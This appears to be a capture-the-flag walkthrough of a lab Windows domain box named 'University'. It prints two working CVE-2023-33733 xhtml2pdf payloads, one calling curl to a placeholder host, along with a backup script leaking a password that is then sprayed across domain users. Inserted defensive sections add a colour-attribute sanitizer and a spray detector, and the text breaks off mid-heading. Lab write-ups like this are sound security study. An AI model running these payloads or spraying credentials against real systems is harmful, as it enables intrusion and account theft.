[M] University [Undone]

Enum

Nmap scan

PORT      STATE SERVICE       VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.24.0
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: 4B8EA3A7F1A92D888835020074BB5558
|_http-server-header: nginx/1.24.0
|_http-title: University
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-08 14:31:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
59453/tcp open msrpc Microsoft Windows RPC

Shell as User - wao

Tcp-80

Register an account. I tried registering a teacher account first, but could not log in with it, so I registered a student account instead.

There is a feature that exports the personal profile as a PDF.

The PDF's properties show it was generated with the xhtml2pdf component. A web search turns up an RCE vulnerability in it, CVE-2023-33733.

https://github.com/c53elyas/CVE-2023-33733

This GitHub repository is for testing the POC: running poc.py is equivalent to running the payload, and the RCE happens in the system() call.

<para>
<font color="[ [ getattr(pow,Word('__globals__'))['os'].system('curl http://xxx.xxx.xxx.xxx/') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
exploit
</font>
</para>

This POC failed several times; further down in the repository there is another variant.

This one is the payload for RCE during HTML-to-PDF conversion, which fits this environment better.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>

After updating the profile information, the page renders as shown, meaning every tag was parsed normally, which is what the payload needs in order to execute.
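Defensive note, as an added example that is not from this writeup or from the xhtml2pdf/reportlab projects: the payloads above work because a `color` attribute value that the colour parser does not recognise is handed to an expression evaluator. The real fix is upgrading reportlab to a release that patches CVE-2023-33733; as defence in depth, an application that renders user-supplied HTML to PDF can also refuse any colour value that is not a plain name, a hex triplet or an `rgb()` tuple before the markup reaches the converter. The function names, the regular expressions and the constructed sample document below are assumptions of this example; the unsafe value in the sample is only shaped like the payloads and does nothing.

```python
import re

# Colour forms reportlab's parser accepts directly. Anything else (brackets,
# quotes, calls, operators) is what the CVE-2023-33733 payloads rely on, so
# the whitelist rejects it instead of letting it reach the evaluator.
_NAMED = re.compile(r"[A-Za-z]{1,30}")
_HEX = re.compile(r"#(?:[0-9A-Fa-f]{3}|[0-9A-Fa-f]{6}|[0-9A-Fa-f]{8})")
_RGB = re.compile(r"rgb\(\s*\d{1,3}\s*,\s*\d{1,3}\s*,\s*\d{1,3}\s*\)")

# Any attribute whose name ends in "color" (color, backColor, ...) with a quoted value.
_COLOR_ATTR = re.compile(r"""(\b\w*color\s*=\s*)(["'])(.*?)\2""", re.I | re.S)


def is_safe_color(value: str) -> bool:
    """True only for a bare colour name, a hex triplet or an rgb() tuple."""
    v = value.strip()
    return any(p.fullmatch(v) for p in (_NAMED, _HEX, _RGB))


def find_unsafe_colors(html: str) -> list[str]:
    """Return every colour attribute value that would fall through to the evaluator."""
    return [m.group(3) for m in _COLOR_ATTR.finditer(html) if not is_safe_color(m.group(3))]


def sanitize_color_attrs(html: str, fallback: str = "black") -> str:
    """Replace each unsafe colour value with a harmless default, keeping the original quoting."""
    def fix(m: re.Match) -> str:
        prefix, quote, value = m.group(1), m.group(2), m.group(3)
        return f"{prefix}{quote}{value if is_safe_color(value) else fallback}{quote}"
    return _COLOR_ATTR.sub(fix, html)


# Constructed sample (not the exploit): a benign profile fragment plus a colour
# attribute shaped like the payloads above, with an inert expression body.
SAMPLE_HTML = (
    '<para><font color="#336699">Name: student</font></para>'
    '<para><font color="[[x for x in [1]]] and \'red\'">exploit</font></para>'
)

if __name__ == "__main__":
    print("rejected:", find_unsafe_colors(SAMPLE_HTML))
    print(sanitize_color_attrs(SAMPLE_HTML))
```

Run the sanitizer on the markup immediately before calling the converter, and log whatever `find_unsafe_colors` returns: a profile field containing brackets or quotes inside a colour attribute is a strong indicator that someone is probing this exact bug.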

Enum

There is a backup directory.

$sourcePath = "C:\Web\University\db.sqlite3"
$destinationPath = "C:\Web\DB Backups\"
$7zExePath = "C:\Program Files\7-Zip\7z.exe"

$zipFileName = "DB-Backup-$(Get-Date -Format 'yyyy-MM-dd').zip"
$zipFilePath = Join-Path -Path $destinationPath -ChildPath $zipFileName
$7zCommand = "& `"$7zExePath`" a `"$zipFilePath`" `"$sourcePath`" -p'WebAO1337'"
Invoke-Expression -Command $7zCommand

The password for the backup file is visible here; it can be sprayed, so first collect all domain users.
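Detection counterpart, added here and not part of the writeup: a password recovered from a backup script and sprayed across every domain account produces a burst of failed logons (event 4625) from one source against many distinct accounts in a short window, which is exactly the pattern a domain controller's security log exposes. The single-line log format, the field order, the account names and the sample lines below are constructed for this example; the detector flags any source that fails against at least `min_accounts` distinct accounts within `window_seconds`, and also reports any successful logon (4624) from that source after the spray started, since that is the account the spray found.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (not taken from the box): "<timestamp> <event id> <account> <source ip>".
# 10.10.14.5 fails once against six different accounts within two minutes (spray)
# and then logs on successfully as one account; 10.10.14.9 fails three times
# against the same account (an ordinary mistyped password).
SAMPLE_LOG = """\
2024-11-08T14:31:30 4625 university.htb\\alice   10.10.14.5
2024-11-08T14:31:31 4625 university.htb\\bob     10.10.14.5
2024-11-08T14:31:33 4625 university.htb\\carol   10.10.14.5
2024-11-08T14:31:34 4625 university.htb\\dave    10.10.14.5
2024-11-08T14:31:36 4625 university.htb\\erin    10.10.14.5
2024-11-08T14:33:10 4625 university.htb\\frank   10.10.14.5
2024-11-08T14:33:12 4624 university.htb\\wao     10.10.14.5
2024-11-08T14:40:00 4625 university.htb\\bob     10.10.14.9
2024-11-08T14:40:20 4625 university.htb\\bob     10.10.14.9
2024-11-08T14:41:05 4625 university.htb\\bob     10.10.14.9
"""


def parse_log(text: str) -> list[tuple[datetime, int, str, str]]:
    """Parse the constructed format into (timestamp, event id, account, source ip) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, account, src = line.split()
        events.append((datetime.fromisoformat(ts), int(event_id), account, src))
    return events


def detect_spray(events, window_seconds: int = 300, min_accounts: int = 5) -> dict:
    """Return {source_ip: {"accounts": [...], "logon_after": [...]}} for every source
    whose failed logons inside one sliding window hit at least min_accounts distinct accounts."""
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ts, event_id, account, src in events:
        if event_id == 4625:
            failures[src].append((ts, account))
        elif event_id == 4624:
            successes[src].append((ts, account))

    flagged = {}
    for src, attempts in failures.items():
        attempts.sort()
        in_window = defaultdict(int)  # account -> failures currently inside the window
        left = 0
        for ts, account in attempts:
            in_window[account] += 1
            # Slide the window forward: drop attempts older than window_seconds.
            while ts - attempts[left][0] > window:
                old = attempts[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) >= min_accounts:
                spray_start = attempts[left][0]
                flagged[src] = {
                    "accounts": sorted({a for _, a in attempts}),
                    "logon_after": sorted(a for t, a in successes.get(src, []) if t >= spray_start),
                }
                break
    return flagged


if __name__ == "__main__":
    for src, info in detect_spray(parse_log(SAMPLE_LOG)).items():
        print(src, "sprayed", len(info["accounts"]), "accounts; successful logon after:", info["logon_after"])
```

The thresholds are the tunable part: a 5-minute window with five distinct accounts catches a one-password-per-user spray like the one this box invites, while a single account failing repeatedly from one source is left alone so that lockout noise from ordinary users does not trigger the rule.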

Got the wao user's password; run BloodHound again.

wao has no special privileges, but is a member of the WEB DEVELOPERS group.

Shell as User =